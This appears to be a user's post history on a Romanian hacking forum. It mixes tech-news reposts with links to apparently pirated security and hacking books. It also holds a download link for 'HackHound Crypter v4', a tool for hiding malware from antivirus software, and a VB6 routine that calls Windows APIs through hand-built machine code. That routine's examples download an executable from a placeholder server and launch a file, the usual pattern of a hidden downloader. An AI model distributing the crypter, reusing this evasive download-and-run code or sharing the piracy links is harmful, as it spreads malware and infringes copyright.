-
Posts
18711 -
Joined
-
Last visited
-
Days Won
701
Everything posted by Nytro
-
Hacker Highschool - Security Awareness For Teens Hacker Highschool - Complete Table Of Contents and Glossary Hacker Highschool - Lesson 01 - Being a Hacker Hacker Highschool - Lesson 02 - Windows and Linux Hacker Highschool - Lesson 03 - Ports and Protocols Hacker Highschool - Lesson 04 - Services and Connections Hacker Highschool - Lesson 05 - System Identification Hacker Highschool - Lesson 06 - Malware (Viruses, Trojans, etc.) Hacker Highschool - Lesson 07 - Attack Analysis Hacker Highschool - Lesson 08 - Digital Forensics Hacker Highschool - Lesson 09 - E-mail Security and Privacy Hacker Highschool - Lesson 10 - Web Security and Privacy Hacker Highschool - Lesson 11 - Passwords Hacker Highschool - Lesson 12 - Internet Legalities and Ethics Download: http://rapidshare.com/files/171574402/Hacker_Highschool_-_Complete_Table_Of_Contents_and_Glossary.rar http://rapidshare.com/files/171574399/Hacker_Highschool_-_Lesson_01_-_Being_a_Hacker.rar http://rapidshare.com/files/171575232/Hacker_Highschool_-_Lesson_02_-_Windows_and_Linux.rar http://rapidshare.com/files/171575251/Hacker_Highschool_-_Lesson_03_-_Ports_and_Protocols.rar http://rapidshare.com/files/171575987/Hacker_Highschool_-_Lesson_04_-_Services_and_Connections.rar http://rapidshare.com/files/171576161/Hacker_Highschool_-_Lesson_05_-_System_Identification.rar http://rapidshare.com/files/171576750/Hacker_Highschool_-_Lesson_06_-_Malware__Viruses__Trojans__etc._.rar http://rapidshare.com/files/171576917/Hacker_Highschool_-_Lesson_07_-_Attack_Analysis.rar http://rapidshare.com/files/171577561/Hacker_Highschool_-_Lesson_08_-_Digital_Forensics.rar http://rapidshare.com/files/171577592/Hacker_Highschool_-_Lesson_09_-_E-mail_Security_and_Privacy.rar http://rapidshare.com/files/171578566/Hacker_Highschool_-_Lesson_10_-_Web_Security_and_Privacy.rar http://rapidshare.com/files/171578573/Hacker_Highschool_-_Lesson_11_-_Passwords.rar http://rapidshare.com/files/171579362/Hacker_Highschool_-_Lesson_12_-_Internet_Legalities_and_Ethics.rar Full Book: http://rapidshare.com/files/171582414/Hacker_Highschool_-_Security_Awareness_For_Teens.rar
-
The Hacker Crackdown: Law and Disorder on the Electronic Frontier # Paperback: 292 pages # Publisher: IndyPublish.com (May 2002) # Language: English # ISBN-10: 1404306412 Bruce Sterling's classic work highlights the 1990 assault on hackers, when law-enforcement officials successfully arrested scores of suspected illicit hackers and other computer-based law-breakers. These raids became symbolic of the debate between fighting serious computer crime and protecting civil liberties. However, The Hacker Crackdown is about far more than a series of police sting operations. It's a lively tour of three cyberspace subcultures--the hacker underworld, the realm of the cybercops, and the idealistic culture of the cybercivil libertarians. Sterling begins his story at the birth of cyberspace: the invention of the telephone. We meet the first hackers--teenage boys hired as telephone operators--who used their technical mastery, low threshold for boredom, and love of pranks to wreak havoc across the phone lines. From phone-related hi-jinks, Sterling takes us into the broader world of hacking and introduces many of the culprits--some who are fighting for a cause, some who are in it for kicks, and some who are traditional criminals after a fast buck. Sterling then details the triumphs and frustrations of the people forced to deal with the illicit hackers and tells how they developed their own subculture as cybercops. Sterling raises the ethical and legal issues of online law enforcement by questioning what rights are given to suspects and to those who have private e-mail stored on suspects' computers. Additionally, Sterling shows how the online civil liberties movement rose from seemingly unlikely places, such as the counterculture surrounding the Grateful Dead. The Hacker Crackdown informs you of the issues surrounding computer crime and the people on all sides of those issues. Download: http://rapidshare.com/files/71568229/1404306412_IndyPublish_-_The.Hacker.Crackdown-Law.and.Disorder.on.the.Electronic.Frontier.May.2002.r Dupa ce descarcati, schimbati extensia in .rar.
-
Hacker Attack, Shield your computer from internet crime
Nytro posted a topic in Tutoriale in engleza
Hacker Attack, Shield your computer from internet crime Sybex Inc; (September 22, 2000) | English | ISBN-10: 0782128300 | 320 pages | PDF | 2.18 MB | RAR Hacker Attack is the only book about computer security that is at once entertaining, understandable, and practical. You’ll be fascinated as you read about hackers, crackers and whackers–people who spend their time trying to break into your computer, spreading computer viruses, or peeping (and recording what they see!) as you surf the Internet or send email. Best of all, this book provides simple but powerful solutions to all these security needs. It’s all on the book’s CD. Protect yourself right now with firewalls, anonymisers, and virus-guards. This is without doubt the most readable and interesting book about computer security ever written. You’ll enjoy reading it, and you’ll be safe after you’ve followed its advice. Download : http://uploading.com/files/AZB0LSMM/HaAtteBo.rar.html http://w13.easy-share.com/1903262460.html http://letitbit.net/download/2e7c74596303/HaAtteBo.rar.html -
Product Description Since 1984, the quarterly magazine 2600 has provided fascinating articles for readers who are curious about technology. Find the best of the magazine’s writing in Best of 2600: A Hacker Odyssey, a collection of the strongest, most interesting, and often most controversial articles covering 24 years of changes in technology, all from a hacker’s perspective. Included are stories about the creation of the infamous tone dialer “red box” that allowed hackers to make free phone calls from payphones, the founding of the Electronic Frontier Foundation, and the insecurity of modern locks. From the Back Cover 24 years of enduring exploits, creative controversy, and hackers who made history It's colorful, controversial, cutting-edge — and you can't wait to read the next issue. Since its birth in 1984, 2600: The Hacker Quarterly has published the discoveries and adventures of hackers worldwide. Now you can enjoy the best of them all in this entertaining, provocative collection. From the first curious and intrepid souls who discovered they could outwit Ma Bell to those who've hacked the Department of Defense and ParadisePoker.com, they're all here, telling their stories in their own words. Trailblazing tales from 2600 Hacking an election An American Express phone story The world vs. Kevin Mitnick How to track any UK GSM mobile phone Pirate radio primer Simplex locks — so simple to break A hacker in Iraq The saga of Bernie S All the details about DeCSS Hacking Google Adwords See all Editorial Reviews Product Details * Hardcover: 888 pages * Publisher: Wiley (July 21, 2008) * Language: English * ISBN-10: 0470294191 * ISBN-13: 978-0470294192 Download: http://rapidshare.com/files/147409820/The_Best_of_2600__0470294191.rar
-
Hardware-based Computer Security Techniques to Defeat Hackers From Biometrics to Quantum Cryptography Author: Roger R. Dube Hardcover: 256 pages Publisher: Wiley (August 25, 2008) Language: English ISBN-10: 0470193395 ISBN-13: 978-0470193396 Format: pdf Details: The protection of critical information and systems is a major component of today's electronic business community. This valuable reference presents the primary hardware-based computer security approaches in an easy-to-read toolbox format. The techniques discussed show readers how to perform their own evaluation of new and emerging security technologies. It is an invaluable source for computer engineers, computer security specialists, electrical engineers, software engineers, IT professionals, and advanced undergraduate and graduate students in computer engineering and computer science. Download: http://rapidshare.com/files/186109001/Hw-b4s3d.Comp.Sec.Tchs.2.Def34t.H4ck3r5-virTuAlZin.rar
-
Book Description This book is a practical guide to discovering and exploiting security flaws in web applications. The authors explain each category of vulnerability using real-world examples, screen shots and code extracts. The book is extremely practical in focus, and describes in detail the steps involved in detecting and exploiting each kind of security weakness found within a variety of applications such as online banking, e-commerce and other web applications. The topics covered include bypassing login mechanisms, injecting code, exploiting logic flaws and compromising other users. Because every web application is different, attacking them entails bringing to bear various general principles, techniques and experience in an imaginative way. The most successful hackers go beyond this, and find ways to automate their bespoke attacks. This handbook describes a proven methodology that combines the virtues of human intelligence and computerized brute force, often with devastating results. The authors are professional penetration testers who have been involved in web application security for nearly a decade. They have presented training courses at the Black Hat security conferences throughout the world. Under the alias "PortSwigger", Dafydd developed the popular Burp Suite of web application hack tools. Download: http://rapidshare.com/files/87418096/0470170778.rar PDF: 770 de pagini
-
Secrets Of A Super Hacker Loompanics Unlimited | January 1994 | English | ISBN-10: 1559501065 | PDF | 205 Pages | 648 KB Overview: The Knightmare is the sort of Super Hacker who keeps security guards from sleeping at night. He's not motivated by money or malice. He's in it for the hack. If your computer has any link whatever to the outside world, there is not question. The Knightmare can break in; the only question is whether he wants to. Secrets of a Super Hacker is an extraordinary manual on the methods of hacking. Here are some of the techniques covered in this data-devouring dossier: - Brute Force Attacks: Hurling passwords at a system until it cracks. - Social Engineering and Reverse Social Engineering: Seducing legitimate users into revealing their passwords. - Spoofing: Designing dummy screens; Delivering fake e-mail. - Superuser Abuser: How to get system managers to do your dirty work for you. - Screening Stealing: How to secretly record every image that appears on a computer screen - Data Delivery: How to hide the information you've collected; How to e-mail it to your computer. - Stair Stepping: How to use a low-level account to gain ever-higher levels of access. - And Much More! Including a brief history of hacking lists of likely passwords, a summary of computer crime laws and a glossary. The Super Hacker reveals all his secrets: Trojan Horses, Viruses, Worms, Trap Doors and Dummy Accounts. The how-to text is highlighted with bare-knuckle tales of The Knightmare's hacks, including on-site hacking remote-access hacking and bulletin board busting. No system can withstand the ingenious, unrelenting assaults of The Knightmare. And no person concerned with computer security should miss this amazing manual of mayhem. PDF, are vreo 230 de pagini. Download: http://rapidshare.com/files/185519606/Secrets_of_a_super_hacker.rar De asemenea, cred ca e o prostie.
-
Poate a blocat firewall-ul clientul care asculta pe un port. Dar trebuia sa apara sa dai Allow.
-
(CEH) - Certified Ethical Hacker Series Screenshot: Details: Certification for Ethical Hackers What is an ethical hacker and how can you become one? By Michael C. Gregg Ever had thoughts of becoming a hacker, an ethical one that is? The EC-Council has released a certification called Certified Ethical Hacker (CEH). Its goal is to certify security practitioners in the methodology of ethical hacking. This vendor neutral certification covers the standards and language involved in common exploits, vulnerabilities, and countermeasures. If you have been to a bookstore lately, you've most likely seen that there is an abundance of books on hacking and "how to hack." Until now, few organizations have worked toward quantifying ethical hacking, defining its legalities, or specifying its useful role in modern organizations. This is what the EC-Council is attempting to do with this certification. Keep reading if you want to learn more. Why Must We Have Ethical Hackers? Organizations must secure their IT infrastructure and networks. Just as corporations employ auditors to routinely examine financial records, so should corporations audit security policy. We have all seen the havoc that a lack of real financial audits can cause. Just as accountants perform bookkeeping audits, ethical hackers perform security audits. Without security audits and compliance controls, no real security exists. This is a big problem. There are plenty of individuals waiting to test and probe your organization's security stance. These individuals range from government and corporate spies, to hackers, crackers, script kiddies, or those who write and release malicious code into the wild. Their presence in your network in not a good thing! Who Are Ethical Hackers? An ethical hacker is most similar to a penetration tester. The ethical hacker is an individual who is employed or contracted to undertake an attempted penetration test. These individuals use the same methods employed by hackers. In case you were unsure; hacking is a felony in the United States. Ethical hackers have written authorization to probe a network. Only then is this attempted hack legal, as there is a contract between the ethical hacker and the organization. In 1995, long before today's more stringent guidelines, one individual received 3 felony counts, 5 years probation, 480 hours of community service, and a $68,000 legal bill for failing to insure proper authorization. Don't let this happen to you! Download: http://rapidshare.com/files/143976615/Ethical_HackingDer_Jager.part1.rar http://rapidshare.com/files/143977995/Ethical_HackingDer_Jager.part2.rar http://rapidshare.com/files/143979040/Ethical_HackingDer_Jager.part3.rar
-
I-am dat eu warn. E butonul ala cu cartonasele galben/rosu ca la fotbal de sub avatar.
-
Un mic tool pentru RST: Encoder/Decoder URL: http://rstcenter.com/index.php?pagina=encoder Are si functii de encrypt/decrypt, dar deocamdata nu sunt functionale, vor fi in curand. Encode: - 1337 - mIRC ( Beta ) - md5 - md4 - sha1 - sha256 - sha384 - sha512 - base64 - crypt - crc32 - crc32b - rot13 - uuencode - hex - binary - octal - ascii - reverse - ripemd128 - ripemd160 - whirlpool - snefru - gost - adler32 - urlencode - htmlentities - tiger128 - tiger192 - haval128 - haval256 Decode: - 1337 - mIRC - base64 - uudecode - hex - binary - octal - ascii - urldecode - htmlentities - rot13 - reverse In curand vor functiona si: - AES - DES - 3DES - Cast-128 - Cast-256 - Gost - Twofish - Loki97 - Rijndael-192 - Rijndael-256 - Saferplus - Blowfish - Blowfish-compat - Xtea - RC2 Asteptam sugestii.
-
Nu prea cred ca e FUD, e veche, dar mi-au placut optiunile.
-
[VB6] HackHound Crypter v4 Fixed Screenshot: Download: http://rapidshare.com/files/220029737/HackHound_Crypter_V.4__FIXED_SCR_.rar
-
Tovarase, daca nu ar fi comunisti ca mine aici, ar fi plin de "wow ce tare", "tnx", "LOL", "OMG" si "reupload"-uri. Nu are nimeni ce face cu numarul de posturi aici.
-
Call API Function Credits to Cobein Declare Sub RtlMoveMemory Lib "kernel32" (dest As Any, src As Any, ByVal L As Long) Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long Function CallApiByName(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long On Error Resume Next Dim lPtr As Long Dim bvASM(&HEC00& - 1) As Byte Dim I As Long Dim lMod As Long lMod = GetProcAddress(LoadLibraryA(sLib), sMod) If lMod = 0 Then Exit Function lPtr = VarPtr(bvASM(0)) RtlMoveMemory ByVal lPtr, &H59595958, &H4: lPtr = lPtr + 4 RtlMoveMemory ByVal lPtr, &H5059, &H2: lPtr = lPtr + 2 For I = UBound(Params) To 0 Step -1 RtlMoveMemory ByVal lPtr, &H68, &H1: lPtr = lPtr + 1 RtlMoveMemory ByVal lPtr, CLng(Params(I)), &H4: lPtr = lPtr + 4 Next RtlMoveMemory ByVal lPtr, &HE8, &H1: lPtr = lPtr + 1 RtlMoveMemory ByVal lPtr, lMod - lPtr - 4, &H4: lPtr = lPtr + 4 RtlMoveMemory ByVal lPtr, &HC3, &H1: lPtr = lPtr + 1 CallApiByName = CallWindowProcA(VarPtr(bvASM(0)), 0, 0, 0, 0) End Function Example: lRet = CallApiByName("urlmon", "URLDownloadToFileW", 0, StrPtr("http://server.com/test.exe"), StrPtr("C:\test.exe"), 0, 0) lRet = CopyFile("C:\test.exe", "c:\test2.exe", False) Function CopyFile(src As String, dest As String, Optional FailIfDestExists As Boolean) As Boolean Dim lRet As Long lRet = CallApiByName("kernel32", "CopyFileW", StrPtr(src), StrPtr(dest), VarPtr(FailIfDestExists)) CopyFile = (lRet > 0) End Function msgbox GetSysDir Function GetSysDir() As String On Error Resume Next Dim Location(512) As Byte Call CallApiByName("kernel32", "GetSystemDirectoryW", VarPtr(Location(0)), 512) GetSysDir = Left$(Location, InStr(Location, Chr$(0)) - 1) End Function Call CallApiByName("kernel32", "Sleep", 1000) Call CallApiByName("shell32", "ShellExecuteW", 0, 0, StrPtr("C:\file.exe"), 0, 0, 0)
-
http://rstcenter.com/forum/search.php?do=finduser&u=18609 PS: Fara offtopic si "l0l"-uri.
-
Windows 7 va permite downgrade la Windows XP de Catalin Calciu | 9 aprilie 2009 O decizie foarte interesanta a venit din partea celor de la Microsoft, o decizie care va bucura multa lume, si va surprinde la fel de multi oameni. La putin timp inaintea lansarii oficiale a lui Windows 7 ei tocmai au anuntat ca vor permite downgrade-ul nu numai pana la Windows Vista, ci chiar si pana la Windows XP. Decizia este destul de ciudata pentru ca in acelasi timp cu Windows Vista, cei de la Microsoft, au declarat in nenumarate randuri ca intentioneaza sa opreasca orice support pentru XP, lansat tocmai in anul 2001. Un purtator de cuvant al Microsoft a declarat in acelasi timp ca vanzarile de XP vor fi intrerupte in anul 2010.
-
Microsoft concureaza direct cu Google de Catalin Calciu | 24 martie 2009 Daca pana acum ne obisnuisem ca cei de la Google sa scoata tot felul de solutii care sa concureze produsele de la Microsoft iata ca a venit momentul in care acestia din urma atenteaza la suprematia celor de la Goole, in acest caz in ceea ce priveste serviciul lor de harti. Microsoft vor lansa GeoSynth ce va face exact acelasi lucru ca si Google Street View, adica poze HD plasate de utilizatori vor fi conectate cu date geografice pentru a da posibilitatea explorarii a cat mai multor locuri. De asemenea GeoSynth va fi cel mai probabil interconectat cu Virtual Earth, si va suporta Silverlightin cursul acestei veri. O alta declaratie interesanta a celor de la Microsoft spune ca hartile se vor incarca de noua ori mai repede in Internet Explorer 8 si de cinci ori mai repde in Google Chrome, decat solutiile prezente in acest moment.
-
Vista – cota de piata 30% de Ionut Mares | 24 martie 2009 Microsoft Windows Vista este disponibil pe piata de mai bine de doi ani si cu toate acestea, cota de piata este doar de 30%. In continuare, Windows XP ramane lider atat in randul produselor Microsoft cat si in comparatie cu alte sisteme de operare disponibile publicului. Chiar si asa, Windows XP a inceput sa piarda teren iar cota actuala de piata se situeaza putin peste 57%. Potrivit StatCounter Information, Vista este cel mai popular sistem de operare in randul celor care-si schimba computere cu unele noi precum si in randul celor care utilizeaza doar in activitati specifice timpului liber. De asemenea, StatCounter a precizat ca Windows XP a pierdut cotat de piata mult prea rapid iar Vista a castigat cateva procente. In ceea ce priveste piata Americana, s-a remarcat si un trend crescator al utilizatorilor care au trecut la de XP direct la Max OS X in detrimentul Vista. Astfel, cota de piata a sistemelor Apple a crescut de la 6.6% la 8.3% in perioada Ianuarie – Martie 2009. Ionut.Mares@hit.ro
-
Filme complete gratuit pe Youtube de Ionut Mares | 10 aprilie 2009 Sony a confirmat in acesta saptamana zvonurile potrivit carora poarta discutii cu reprezentatii Youtube in vederea postarii online a unor filme de lung metraj. Daca negocierile vor avea succes, Sony Pictures va deveni primul mare producator de filme de pe piata americana care va oferi in premiera gratuit titluri celebre de filme in varianta full. Acestea vor avea evident si calupuri publicitare pentru a acoperi eventualele costuri. Daca din partea celor de la Sony avem confirmarea negocierilor, reprezentatii Youtube au refuzat sa dea detalii. In prezent, Sony Pictures are postate peste 60 de filme complete pe site-ul Crackle.com. Un alt mare gigan din industira cinematrografica, MGM este deja prezent pe Youtube dar cu clipuri sau scene limitate ca timp. Probabil, aceasta este singura varianta prin care producatorii nord americani vor reusi sa tempereze pirateria. In loc sa lase utilizatorii sa downloadeze copii ilegale, mai bine le ofera gratuit iar banii si vor incasa din publicitatea prezentata in timpul filmelor.
-
Microsoft: 97% din mail-uri sunt spam de Bianca Dinu | 9 aprilie 2009 Un numar realmente imens din totalul de e-mailuri trimise la nivel mondial reprezinta reclame si anunturi spam pentru diferite produse dintre care predomina cele farmaceutice si medicamentoase. Potrivit unui raport realizat de Microsoft ce priveste securitatea pe internet, 97% din toate e-mailurile trimise in intreaga lume contin atasamente virusate, ce pot dauna sistemului utilizatorului, cele mai multe fiind transmise prin fisierele Office sau PDF. De asemenea, raportul a aratat ca rata globala a masinilor infectate fata de cele nevirusate prin spam este de 8,6 la 1.000 de computere. Tarile cu cea mai mare rata de infectare prin e-mail sunt Rusia si Brazilia, urmate indeaproape de Turcia, Serbia si Muntenegru, tipurile de spam si malware fiind diferite de la o tara la alta. In Romania, raportul dintre computerele infectate si cele neinfectate este de aproximativ cinci computere din 1000. Raportul Microsoft arata situatia e-mailurilor prin care se trimite spam si malware pentru cea de-a doua jumatete a anului 2008 si ofera date despre procentul de calculatoare infectate cu programe malitioase in toate tarile si regiunile lumii. De asemenea, prin acest raport, Microsoft subliniaza inca o data importanta actualizarii programelor si a sistemelorde operare, pentru a fi mai putin vulnerabile in ceea ce priveste infectarea cu programe malitioase.
-
Firefox pierde 18 milioane de utilizatori anual de Alex Hanea | 9 aprilie 2009 Mozilla a descoperit recent ca, zilnic, 50.000 de oameni nu instaleaza Firefox din cauza unor probleme pe parcursul instalarii, desi au descarcat fara probleme pachetul de software. Cele 50.000 de renuntari de instalare a Firefox se tradus in 18 milioane anual, ceea ce inseamna destul de mult. A imbunatati modalitatea de instalare astfel incat sa satisfaca si sa convinga 3000 de utilizatori din cei 50.000 se traduce, in mai putine cifre, intr-un procent de 0,2% din piata, deloc neglijabil. Astfel, Mozilla a investit putin timp si atentie pentru a analiza aceasta problema si, in urma unui sondaj, a identificat cateva probleme. 42% dintre cei care au raspuns la intrebari au afirmat ca au renuntat la instalarea Firefox din cauza unei instalari anterioare, neinchise, in timp ce 41% au sustinut ca nu aveau drepturile necesare pentru instalare. 7% au fost prea confuzi din cauza upgrade-ului. Raspunsurile i-au determinat pe cei de la Mozilla sa lucreze la o modalitate mai simpla de instalare decat cea de pana acum. Mozilla sufera cu atat mai mult cu cat rivalii sai au modalitati mai simple si mai rapide de instalare. Concluzia sondajului si cea rezultata dupa analiza situatiei este ca procesul de instalare conteaza, fiind masurat, mai exact in cateva milioane de utilizatori pierduti sau castigati.
-
2009 mai amenintator din cauza atacurilor pe Internet de Vlad Matei | 9 aprilie 2009 Romania gazduieste la ora actuala cateva mii de hackeri care provoaca pagube materiale de milioane de dolari in fiecare luna. Furtul de baze de date (date personale, carti de credit) precum si atacuri virulente de phishing sunt principalele activitati a multora dintre hackerii zilelor noastre. "In octombrie am estimat ca activitatea de phishingul va creste de cel putin 10 ori. In 2009, si productia de malware se va mentine pe o curba ascendenta, exploatand aceleasi functionalitati Web prin intermediul troienilor, dar si via amenintarilor de tip spyware si rootkit. Cu siguranta, multe dintre amenintarile existente vor suferi mutatii semnificative si upgrade-uri, mai ales in ceea ce priveste mecanismele de camuflare sau automatizarea procesului de distribuire", a declarat Alexandru Cosoi, Senior Researcher, BitDefender. Atacurile anului 2009 se vor concentra de asemenea si pe exploatarea vulnerabilitatilor, o atentie deosebita fiind acordata ratei crescute de dezvoltare si de extindere a site-urilor Web 2.0. Din cauza crizei financiare, multi oamenii specializati in industria IT vor fi disponibilizati si vor cauta metode alternative de venit, putandu-se indrepta cu usurinta catre actiuni ilicite de tipul malware si phishing. Companiile vor investi mai putin in securitate din aceleasi considerente. Astfel, combinatia acestor doi factori nu face dect sa sporeasca numarul atacurilor de phishing si in special, a phishingului targhetat, datorita informatiilor publice despre utilizatori care se pot gasi cu usurinta acum pe retelele sociale. "Companiile care activeaza in mediul online vor trebui sa acorde in acest an un plus de atentie aplicatiilor web si site-urilor pe care le dezvolta. Infractorii vor incerca sa speculeze orice vulnerabilitate prezenta in aplicatiile web pentru a intra in posesia informatiilor referitoare la utilizatori (nume, conturi, parole, adrese de email) pentru a le folosi ulterior la activitati de tip phishing sau spam. Auditarea periodica a website-urilor si aplicatiilor web va fi esentiala pentru companiile din mediul online", au concluzionat cei de la F5, organizatorii conferintei de securitate Web 2.0. Sursa: BitDefender
-
copiluatomik, ban! Pentru mai multe.
-
Ban! Ca sa nu imi fac nervi pe viitor.